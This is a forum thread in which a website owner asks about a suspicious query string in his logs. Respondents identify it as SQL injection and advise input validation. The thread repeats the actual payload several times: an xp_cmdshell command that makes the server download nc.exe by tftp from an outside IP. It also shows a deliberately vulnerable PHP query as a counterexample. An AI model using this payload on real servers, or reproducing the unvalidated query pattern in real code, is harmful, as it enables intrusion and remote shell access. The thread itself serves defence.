Website Attack??? 4

[Mighty]

Hi Folks,

I'm not sure if I am entering this in the correct forum but I'll give it a try. I have a script which monitors my website logfiles looking for any strange. In last nights logfiles, I noticed that someone entered the following querystring at the end of one of my page URLs:

action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral

This to me looks like someone was trying to execute a script on my website - start a shell script, ftp a file and run it.

How do I guard against something like that?

Mighty

 

[ca8msm]

One possibility is that they are just appending it in the hope of creating a SQL Injection attack. Make sure that you are using Stored Procedures when running queries on your database to protect against these types of attacks.


____________________________________________________________

Need help finding an answer?

Try the Search Facility or read FAQ222-2244 on how to get better results.

 

[BabyJeffy]

He's trying a SQL injection technique on you. Look at this specific part of the URL:

id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--

This is attempting to end the current sql query and using the semi-colon, add in new commands.

Personally, I would just look at your SQL code server-side and make sure that you are testing any script inputs (in this case, GET inputs).

Here is an example of some BAD server-side (PHP) code that would get tripped up by that url:

$id = $_GET['id'];
$sql_statement = "SELECT * FROM tablename WHERE id=$id";

This could be rewritten to test that $id is a number (and doesn't contain any other characters) for instance. As it is right now, the contents of $id contain:

1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--

and the resulting SQL code would look like this:

SELECT * FROM tablename WHERE id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--

Here is a good URL that discusses this and can help in defending against such:

http://johnny.ihackstuff.com/index.php?name=PNphpBB2&file=viewtopic&t=2823

Cheers,
Jeff

[tt]Jeff's Page @ Code Couch

http://www.codecouch.com/jeff/blog/

http://www.coedit.co.uk/

[/tt]

What is Javascript? FAQ216-6094

 

[Mighty]

Guys,

Thanks for the responses. Does this SQL injection work with any particular database or will it work with any database.

In particular, I mostly use Microsoft Access. Will this type of "attack" work with MS Access.

Mighty

 

[feherke]

Hi

Does this SQL injection work with any particular database or will it work with any database.

In fact SQL injection is not working on the database itself, is working on the code written by lazy programmers, who does not escape the special characters in the received data before including them in SQL commands. So yes, any database can be affected/destroyed with this.

Feherke.

http://rootshell.be/~feherke/

 

[Mighty]

When I actually tried to replicate the problem by adding the querystring to my URL and executing it, I get a "Page cannot be displayed" error.

Does this mean that the SQl Injection didn't work?

Mighty

 

[feherke]

Hi

Can not tell. Based on the error message, that request does not reached the server side program/script. So no idea if could or not do any harm.

Feherke.

http://rootshell.be/~feherke/

 

[Mighty]

Thanks for the pointers guys.

Mighty

 

[Wullie]

If you post the full line from the error log then we will be able to tell you if it did run or not.

Hope this helps

Wullie

Fresh Look - Quality Coldfusion 7/Windows Hosting
YetiHost - Coming Soon

The pessimist complains about the wind. The optimist expects it to change. The leader adjusts the sails. - John Maxwell

 

[Mighty]

Hi Wullie,

Where abouts in the error log. I just tried loading the web page using IE6 with the code above appended to the end of the URL and I get a "Page cannot be displayed" error in the browser.



Mighty

 

[Wullie]

Find the section in the log where you got the following from:

action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral

There should be quite a few other strings on the same line as this and that shows what response the server gave. If you copy the full line from the log for this request then we can say for sure whether it did run or not.

When you run it, it seems to have failed but that doesn't mean it failed for all of the requests made. (Assuming it was more than 1 request, which it normally would be)

Hope this helps

Wullie

Fresh Look - Quality Coldfusion 7/Windows Hosting
YetiHost - Coming Soon

The pessimist complains about the wind. The optimist expects it to change. The leader adjusts the sails. - John Maxwell

 

[Mighty]

When it was done yesterday, the two lines from the logfiles are:

2006-05-01 19:48:05 195.10.20.12 GET /oemproducts.asp action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--|52|80040e14|[Microsoft][ODBC_Microsoft_Access_Driver]_Characters_found_after_end_of_SQL_statement. 80 - 84.26.250.77 curl/7.15.3+(i586-pc-mingw32msvc)+libcurl/7.15.3+zlib/1.2.2 500 0 0

2006-05-01 19:48:05 195.10.20.12 GET /oemproducts.asp action=info&id=1;exec%20master..xp_cmdshell%20'tftp%20-i%2084.26.250.77%20get%20nc.exe%20c:\nc.exe';--&type=Peripheral|52|80040e14|[Microsoft][ODBC_Microsoft_Access_Driver]_Characters_found_after_end_of_SQL_statement. 80 - 84.26.250.77 curl/7.15.3+(i586-pc-mingw32msvc)+libcurl/7.15.3+zlib/1.2.2 500 0 0

Does this tell you anything?

Mighty

 

[Wullie]

Your server returned a 500 internal error for the requests above, meaning your code is not filtering the request properly as it did reach the database. Luckily though your database rejected the SQL. You need to get some filtering in to ensure the integrity of the data being passed to the database.

Hope this helps

Wullie

Fresh Look - Quality Coldfusion 7/Windows Hosting
YetiHost - Coming Soon

The pessimist complains about the wind. The optimist expects it to change. The leader adjusts the sails. - John Maxwell